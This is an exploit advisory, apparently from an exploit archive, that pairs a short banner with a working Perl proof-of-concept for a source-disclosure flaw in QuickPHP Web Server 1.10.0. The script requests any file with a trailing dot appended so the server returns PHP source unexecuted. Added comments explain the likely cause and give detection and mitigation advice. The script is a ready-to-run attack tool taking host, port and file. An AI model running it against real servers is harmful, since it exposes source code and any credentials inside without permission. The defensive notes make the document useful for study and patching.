# Title : QuickPHP Web Server Arbitrary (src .php) File Download
# Published : 2010-12-30
# Author : Pr0T3cT10n
# _ ____ __ __ ___
# (_)____ _ __/ __ / /_____ ____/ / _/_/ |
# / // __ | / / / / / //_/ _ / __ / / / / /
# / // / / / |/ / /_/ / ,< / __/ /_/ / / / / /
# /_//_/ /_/|___/____/_/|_|___/__,_/ / /_/_/
# Live by the byte |_/_/
#
# Members:
#
# Pr0T3cT10n
# -=M.o.B.=-
# TheLeader
# Sro
# Debug
#
# Contact: inv0ked.israel@gmail.com
#
# -----------------------------------
# QuickPHP Web Server is vulnerable to a Remote File Download attack; the following code exploits the bug.
# The vulnerability allows an unprivileged attacker to download files that they have no permission to access.
# -----------------------------------
# Vulnerability Title: QuickPHP Web Server 1.10.0 Remote File Download Exploit
# Date: 30/12/2010
# Author: Pr0T3cT10n
# Software Link: http://www.zachsaw.co.cc/downloads/quickphp_webserver.zip
# Affected Version: 1.10.0
# Tested on Windows XP Hebrew, Service Pack 3
# ISRAEL, NULLBYTE.ORG.IL
###
#!/usr/bin/perl
use LWP::Simple;
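# Proof of concept for the QuickPHP Web Server 1.10.0 file-download issue.
#
# Usage: <script> <host> <port> <file>
#
# What the request does: it issues one HTTP GET for
# http://<host>:<port>/<file> with a single "." appended to the file name,
# then prints whatever body comes back. Nothing else is sent.
#
# NOTE(review): the advisory text does not state the root cause. Win32 path
# handling drops trailing dots when a file is opened, so the server presumably
# still opens <file> while no longer recognising its ".php" extension, and
# returns the source instead of running it -- confirm against the server.
#
# Defender notes:
#   - Detection: request paths that end in "." (for example ".php.") in the
#     web server's access log, or at a reverse proxy in front of it, are the
#     visible trace of this request.
#   - Mitigation: normalise or reject request paths with trailing dots before
#     they are mapped to a handler, and run a release in which the vendor has
#     fixed this if one exists (the page names only the affected 1.10.0).
#   - Impact reduction: keep credentials out of PHP files under the document
#     root, since a source disclosure exposes whatever those files contain.
#
# The "\r\n" sequences below restore the line endings that appear on the page
# as a literal "rn" (the backslashes were lost in extraction).
if (@ARGV < 3) {
    # Too few arguments: show the banner and usage, then exit non-zero.
    print("\r\n");
    print("QuickPHP Web Server 1.10.0 Remote File Download Exploit\r\n");
    print("Discovered & Exploited by Pr0T3cT10n\r\n");
    print("-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\r\n");
    print("Usage: " . $0 . " <host> <port> <file>\r\n");
    print("HOST - An host using QuickPHP Web Server\r\n");
    print("PORT - Port number\r\n");
    print("FILE - The file you want to get\r\n");
    print("Example: " . $0 . " hostingserver.com 80 index.php\r\n\r\n");
    exit(1);
}
else {
    print("QuickPHP Web Server 1.10.0 Remote File Download Exploit\r\n");
    print("Discovered & Exploited by Pr0T3cT10n\r\n");
    print("-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\r\n\r\n");

    # Lexicals instead of package globals; nothing outside this branch
    # reads these values.
    my ($host, $port, $file) = @ARGV;

    # The trailing "." is the whole trigger (see the header comment).
    my $content = get("http://" . $host . ":" . $port . "/" . $file . ".");

    print("File Content:\r\n\r\n");

    # LWP::Simple::get() returns undef when the request fails; print an empty
    # body in that case rather than concatenating undef.
    print((defined $content ? $content : "") . "\r\n");
}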